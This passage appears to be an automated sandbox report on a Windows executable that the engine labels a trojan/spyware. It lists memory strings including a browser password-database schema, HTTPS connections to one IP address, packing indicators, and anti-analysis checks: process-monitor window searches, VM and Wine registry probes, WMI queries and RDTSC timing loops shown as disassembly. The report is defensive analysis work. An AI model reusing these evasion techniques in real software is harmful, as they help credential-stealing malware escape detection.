                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: XM6cn2uNux.exe, 00000000.00000003.2778602554.0000000005A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: XM6cn2uNux.exe, 00000000.00000003.2778602554.0000000005A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50008 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: XM6cn2uNux.exeStatic PE information: section name:
                Source: XM6cn2uNux.exeStatic PE information: section name: .idata
                Source: XM6cn2uNux.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012330DD0_3_012330DD
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01213A300_3_01213A30
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01214C5D0_3_01214C5D
                Source: XM6cn2uNux.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: XM6cn2uNux.exeStatic PE information: Section: ZLIB complexity 0.9995659722222222
                Source: XM6cn2uNux.exeStatic PE information: Section: nfuikskw ZLIB complexity 0.9946649186324276
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: XM6cn2uNux.exe, 00000000.00000003.2246588416.0000000005A38000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2341646395.0000000005A38000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2247170665.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: XM6cn2uNux.exeVirustotal: Detection: 53%
                Source: XM6cn2uNux.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile read: C:\Users\user\Desktop\XM6cn2uNux.exeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: XM6cn2uNux.exeStatic file information: File size 1887232 > 1048576
                Source: XM6cn2uNux.exeStatic PE information: Raw size of nfuikskw is bigger than: 0x100000 < 0x1a2a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeUnpacked PE file: 0.2.XM6cn2uNux.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nfuikskw:EW;uavdauvr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nfuikskw:EW;uavdauvr:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: XM6cn2uNux.exeStatic PE information: real checksum: 0x1d861c should be: 0x1d93e2
                Source: XM6cn2uNux.exeStatic PE information: section name:
                Source: XM6cn2uNux.exeStatic PE information: section name: .idata
                Source: XM6cn2uNux.exeStatic PE information: section name:
                Source: XM6cn2uNux.exeStatic PE information: section name: nfuikskw
                Source: XM6cn2uNux.exeStatic PE information: section name: uavdauvr
                Source: XM6cn2uNux.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A148B2 push ss; retf 0_3_05A148B3
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A148B2 push ss; retf 0_3_05A148B3
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A14F34 push ss; ret 0_3_05A14F4D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A14F34 push ss; ret 0_3_05A14F4D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A148B2 push ss; retf 0_3_05A148B3
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A148B2 push ss; retf 0_3_05A148B3
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A14F34 push ss; ret 0_3_05A14F4D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_05A14F34 push ss; ret 0_3_05A14F4D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB60 pushad ; retf 0_3_0120CB61
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB60 pushad ; retf 0_3_0120CB61
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB60 pushad ; retf 0_3_0120CB61
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB64 pushad ; retf 0_3_0120CB65
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB64 pushad ; retf 0_3_0120CB65
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB64 pushad ; retf 0_3_0120CB65
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB68 push 680120CBh; retf 0_3_0120CB6D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB68 push 680120CBh; retf 0_3_0120CB6D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB68 push 680120CBh; retf 0_3_0120CB6D
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CF76 pushfd ; iretd 0_3_0120CF99
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CF76 pushfd ; iretd 0_3_0120CF99
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CF76 pushfd ; iretd 0_3_0120CF99
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB50 push eax; retf 0_3_0120CB51
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB50 push eax; retf 0_3_0120CB51
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB50 push eax; retf 0_3_0120CB51
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01218750 push ds; retf 0_3_01218752
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01218750 push ds; retf 0_3_01218752
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_01218750 push ds; retf 0_3_01218752
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB54 push eax; retf 0_3_0120CB55
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB54 push eax; retf 0_3_0120CB55
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_0120CB54 push eax; retf 0_3_0120CB55
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012150EC push esi; retf 0_3_012150EF
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeCode function: 0_3_012150EC push esi; retf 0_3_012150EF
                Source: XM6cn2uNux.exeStatic PE information: section name: entropy: 7.9847234008770345
                Source: XM6cn2uNux.exeStatic PE information: section name: nfuikskw entropy: 7.953324475907689

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 429249 second address: 428B2D instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57C52C318h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cld 0x00000010 push dword ptr [ebp+122D0465h] 0x00000016 cld 0x00000017 jmp 00007FC57C52C326h 0x0000001c call dword ptr [ebp+122D2588h] 0x00000022 pushad 0x00000023 cmc 0x00000024 xor eax, eax 0x00000026 jnp 00007FC57C52C31Ch 0x0000002c mov dword ptr [ebp+122D1A80h], edx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D200Ch], ecx 0x0000003c mov dword ptr [ebp+122D3A32h], eax 0x00000042 cmc 0x00000043 mov esi, 0000003Ch 0x00000048 pushad 0x00000049 jmp 00007FC57C52C320h 0x0000004e add bx, E697h 0x00000053 popad 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 js 00007FC57C52C32Dh 0x0000005e jmp 00007FC57C52C327h 0x00000063 lodsw 0x00000065 jmp 00007FC57C52C322h 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D1A80h], eax 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov eax, dword ptr [ebp+122D379Eh] 0x0000007f adc dx, D4CBh 0x00000084 popad 0x00000085 nop 0x00000086 jmp 00007FC57C52C31Bh 0x0000008b push eax 0x0000008c je 00007FC57C52C322h 0x00000092 jnp 00007FC57C52C31Ch 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59B9F2 second address: 59BA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FC57CD4ED07h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e jmp 00007FC57CD4ED05h 0x00000013 popad 0x00000014 push ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59BA2C second address: 59BA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59BA32 second address: 59BA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59BA38 second address: 59BA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC57C52C316h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC57C52C316h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58D72A second address: 58D72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58D72F second address: 58D761 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007FC57C52C324h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC57C52C31Ch 0x00000014 je 00007FC57C52C318h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58D761 second address: 58D768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59A97B second address: 59A9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnl 00007FC57C52C348h 0x0000000c jnp 00007FC57C52C322h 0x00000012 pushad 0x00000013 jmp 00007FC57C52C326h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59ACB3 second address: 59ACBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59ACBA second address: 59ACE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C323h 0x00000009 ja 00007FC57C52C316h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jg 00007FC57C52C316h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59ACE7 second address: 59ACEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59ACEC second address: 59ACF1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59AE2A second address: 59AE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59AF79 second address: 59AF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C320h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59AF8D second address: 59AF9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59AF9D second address: 59AFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC57C52C316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59AFA9 second address: 59AFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59AFAD second address: 59AFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC57C52C326h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59B2E2 second address: 59B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F1A0 second address: 59F255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 53A6AB00h 0x00000014 push ebx 0x00000015 jp 00007FC57C52C317h 0x0000001b stc 0x0000001c pop edi 0x0000001d push 00000003h 0x0000001f mov dword ptr [ebp+122D3477h], ecx 0x00000025 jmp 00007FC57C52C324h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FC57C52C318h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D1C22h], esi 0x0000004c push 00000003h 0x0000004e call 00007FC57C52C319h 0x00000053 jmp 00007FC57C52C31Fh 0x00000058 push eax 0x00000059 jmp 00007FC57C52C323h 0x0000005e mov eax, dword ptr [esp+04h] 0x00000062 jmp 00007FC57C52C31Dh 0x00000067 mov eax, dword ptr [eax] 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007FC57C52C31Bh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F255 second address: 59F25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F25A second address: 59F264 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC57C52C31Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
